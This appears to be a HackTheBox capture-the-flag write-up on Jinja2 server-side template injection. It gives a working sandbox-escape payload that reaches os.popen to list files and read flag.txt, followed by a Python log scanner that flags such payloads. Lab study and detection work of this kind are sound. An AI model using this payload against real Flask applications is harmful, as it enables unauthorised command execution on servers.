HACKTHEBOX CHALLENGE: TEMPLATED


This is the second challenge in the web category, and most votes rate it as easy. Let's try it out.

Challenge title: Templated

Challenge description: Can you exploit this simple mistake?

It is related to Flask/Jinja2. By the way, Jinja2 is a web template engine for Python. The challenge title is also "Templated", so it is probably related to SSTI (Server-Side Template Injection).

Payload 1: http://134.209.16.184:32694/{{100+100}}

Result: the page shows 200, so the path we supplied is being evaluated as a template expression.

So we found two vulnerabilities. What else can be done with SSTI apart from adding numbers? There is a good article on SSTI with Jinja2 that you can refer to.

So we can use the __mro__ attribute (the method resolution order) to walk from an empty string up to the base object class and list its subclasses, which comes in extremely handy for building Python SSTI Jinja2 payloads.

Payload:

{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("ls *").read()}}

So the URL will look something like this:

http://64.227.43.192:32601/{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("ls *").read()}}


This lists all the files in the working directory, and guess what: flag.txt is among them. All we need to do now is replace ls * with cat flag.txt.

Final Payload:

{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("cat flag.txt").read()}}

And boom! You have the flag.

I would recommend running each component of the payload as an individual payload, just to understand what the output of each component is.
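As an added example (not part of the original write-up): the two probes above leave a clear trace in web-server access logs. The Python below scans constructed sample log lines, URL-decodes each request path, and flags {{...}} arithmetic probes separately from payloads that walk __class__/__mro__/__subclasses__ toward os.popen. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post). The first
# three mirror the probes the write-up walks through; the last one is benign.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /{{100+100}} HTTP/1.1" 200 312
203.0.113.5 - - [01/Jan/2024:10:00:07 +0000] "GET /%7B%7B%22%22.__class__.__mro__%5B1%5D.__subclasses__()%5B186%5D%7D%7D HTTP/1.1" 200 2048
203.0.113.5 - - [01/Jan/2024:10:00:15 +0000] "GET /{{%22%22.__class__.__mro__[1].__subclasses__()[186].__init__.__globals__[%22__builtins__%22][%22__import__%22](%22os%22).popen(%22cat%20flag.txt%22).read()}} HTTP/1.1" 200 96
198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET /about HTTP/1.1" 404 120
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.*?) HTTP/\d\.\d"')
# {{100+100}}-style arithmetic: the classic "does the engine evaluate me?" probe.
ARITH_RE = re.compile(r"\{\{\s*\d+\s*[-+*/]\s*\d+\s*\}\}")
# Attribute-walk gadgets used to climb from "" to os.popen, as in the write-up.
GADGETS = ("__class__", "__mro__", "__subclasses__", "__globals__",
           "__builtins__", "__import__", "popen", "subprocess")


def classify_path(raw_path):
    """Return None for a benign path, else a dict describing the SSTI attempt."""
    path = unquote(unquote(raw_path))  # two passes also catch double-encoded {{ }}
    if "{{" not in path and "{%" not in path:
        return None
    found = [g for g in GADGETS if g in path]
    if found:
        level = "sandbox_escape"    # walking the MRO toward os: treat as an RCE attempt
    elif ARITH_RE.search(path):
        level = "arithmetic_probe"  # reconnaissance; expect a follow-up request
    else:
        level = "template_syntax"   # {{ or {% present but no known gadget
    return {"path": path, "level": level, "gadgets": found}


def scan_log(text):
    """Return one finding per log line whose request path looks like an SSTI payload."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        finding = classify_path(m.group(2))
        if finding:
            finding["ip"] = m.group(1)
            hits.append(finding)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["level"], hit["gadgets"], hit["path"][:60])
```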

See you on the next challenge. 
